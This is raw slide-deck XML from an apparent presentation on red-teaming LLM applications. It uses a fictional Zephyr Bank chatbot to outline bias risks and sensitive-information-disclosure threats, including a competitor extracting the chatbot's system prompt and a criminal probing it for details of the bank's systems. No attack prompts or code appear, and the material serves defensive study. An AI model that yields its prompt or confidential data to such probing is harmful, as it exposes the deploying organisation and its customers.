      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0EF3DF9-54BB-0D66-554F-627947C08C1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16200000">
            <a:off x="9901863" y="3454983"/>
            <a:ext cx="473773" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphic 18" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E38D12C-ED9F-80CB-9935-750EA14BFC9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5400000">
            <a:off x="8559053" y="4633547"/>
            <a:ext cx="431442" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphic 19" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4CA5880-6AC5-6558-D4AF-0E5148021E2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16200000">
            <a:off x="9915827" y="4634815"/>
            <a:ext cx="428905" cy="42688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2D6F7FB-526A-6814-C195-713CDBBF7F96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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="61088" y="5967110"/>
            <a:ext cx="1761829" cy="7281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3050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819163-8A0E-ED2D-7AAC-BE66997D4E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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B865BDB7-EDAD-014D-0141-74C5E209738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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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57849A1A-45A9-437D-48BD-0F0775C100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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Demo Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1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Teaming LLM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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E4865868-0834-DAB7-E150-45B8B2BE50E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7425267" y="1456267"/>
            <a:ext cx="4072466" cy="5190066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0F91D8C-3CD2-B1A4-3E87-D1D78324F0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441266" y="1764793"/>
            <a:ext cx="20404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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LLM Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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90010F81-A286-FB2D-4E36-0D8BEDB6723B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="2590800"/>
            <a:ext cx="3403600" cy="83820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LLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GPT – 3.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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C6F8D71-335E-53F5-24EB-45B7C58F3B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="3962400"/>
            <a:ext cx="3403600" cy="668867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Orchestration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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B0696B61-9DB2-A8D8-030B-AF2942F6048F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7759700" y="5067299"/>
            <a:ext cx="3403600" cy="1172634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Knowledge Base</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mozart Bio</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/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1595562B-9BAF-80B4-1DC5-1252C4FEE571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199468" y="3716867"/>
            <a:ext cx="1134532" cy="1092200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11" name="Graphic 10" descr="User with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225B85BD-2F65-F3BE-9799-873A334B71A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309534" y="3716867"/>
            <a:ext cx="914400" cy="914400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EE514455-1E95-28B3-C996-49554B11AAB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445423" y="4446601"/>
            <a:ext cx="7112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User</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE074321-1AC2-F251-B3C5-06883058CE6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5833745" y="3747816"/>
            <a:ext cx="914400" cy="606968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic 15" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B802D23C-2554-81D9-A07A-54F50CF2871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10800000">
            <a:off x="5833745" y="4171058"/>
            <a:ext cx="914400" cy="606968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32334820-FC81-09A7-ECD2-F6CD40AE3C0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5400000">
            <a:off x="8546352" y="3452443"/>
            <a:ext cx="473773" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14B6009F-6206-B42A-F6C9-80D72580B64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16200000">
            <a:off x="9901863" y="3454983"/>
            <a:ext cx="473773" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphic 18" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A517E2E-84A4-478E-6399-A0E9BEBA025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5400000">
            <a:off x="8559053" y="4633547"/>
            <a:ext cx="431442" cy="426886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphic 19" descr="Arrow Right with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E4C7E5-F633-B2AE-F4AC-B0FF44CC602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16200000">
            <a:off x="9915827" y="4634815"/>
            <a:ext cx="428905" cy="42688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47ACEB71-C9C7-487C-AAF2-DF7E5E767EDC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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="272755" y="5821908"/>
            <a:ext cx="1761829" cy="7281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9696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726EAC-DE8E-ED2E-9348-2407B2C2FD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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653C4757-A903-69A7-F24C-D7F4FF4187F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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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6004B41B-BF2E-C370-43A6-AE1B42BB0E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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Bias &amp; Stereotype</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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2EBCA08-F010-F9A9-2E03-A3A2C1DF7360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1674674"/>
            <a:ext cx="10195562" cy="30839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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Customer chats with Zephyr Bank’s chatbot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chatbot gives a stereotypical answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Customer posts screenshot on social media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Screenshot goes viral and reputation of Zephyr Bank tanks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D0C87DD-F599-D54A-A65A-22F8C12FDAFF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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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658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42D1D7-48EA-D31D-5CF8-85BD70DBAF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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77706987-0DFA-9BFF-A594-136B97E3290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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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6C93C3C7-DEBB-3D12-23D8-09EB3C917D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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Bias &amp; Stereotype</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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35B0500-AC3F-60BC-5FDB-21D8EFD8FDB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1674674"/>
            <a:ext cx="10195562" cy="41996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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Causes:</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implicit bias present in foundation model</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wrong document used to build the answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenarios:</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Competitor attempts to obtain the prompt used by Bank’s chatbot, to use it in their own chatbot</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cybercriminal tries to obtain sensitive information about the bank’s systems through the chatbot.</a:t>
            </a:r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IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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22EB265-1955-2099-27B0-CBF3701494CD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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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30661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DD4142-448A-B2B3-66F3-85D9D22CB1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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7347F76B-D770-A55D-3D1E-225E109A8A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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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B9F921B9-7A54-CEC0-AC1D-1D5D7433BF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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Bias &amp; Stereotype</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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519A1B0-2083-131B-AEFC-D1E740403043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1674674"/>
            <a:ext cx="10195562" cy="41996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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Causes:</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implicit bias present in foundation model</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wrong document used to build the answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenarios:</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Competitor attempts to obtain the prompt used by Bank’s chatbot, to use it in their own chatbot</a:t>
            </a:r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IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cybercriminal tries to obtain sensitive information about the bank’s systems through the chatbot.</a:t>
            </a:r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IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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84A8C75-B669-ADF2-6B61-CBDF09A324E2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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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2308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B466BBA-578F-C4F6-1CBE-CBC6EA588A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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{274AD40F-2BEC-B939-9259-416C03BD21C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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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720D9CC3-FCF0-58F2-A7A7-408023155A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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Sensitive Information Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C7E51C7-A912-0336-6297-1AA96E6F969E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1674674"/>
            <a:ext cx="10195562" cy="18528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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Causes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sensitive or confidential data stored within documents accessible by the chatbot </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Private information included in prompts that could be inadvertently exposed</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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28B6911-ED95-0EBB-7893-46E4CA9B7AFB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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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0110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5EA2310-15BA-8194-E232-FB7E098CDF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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D82CA36-82FC-7772-6E7A-54E3FF08A61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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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EC69E0FF-C9DE-212B-7AE7-25E0690F78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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Sensitive Information Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C510A14-290F-B7D1-0B23-34C1BB4A3AE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1674674"/>
            <a:ext cx="10195562" cy="24683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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
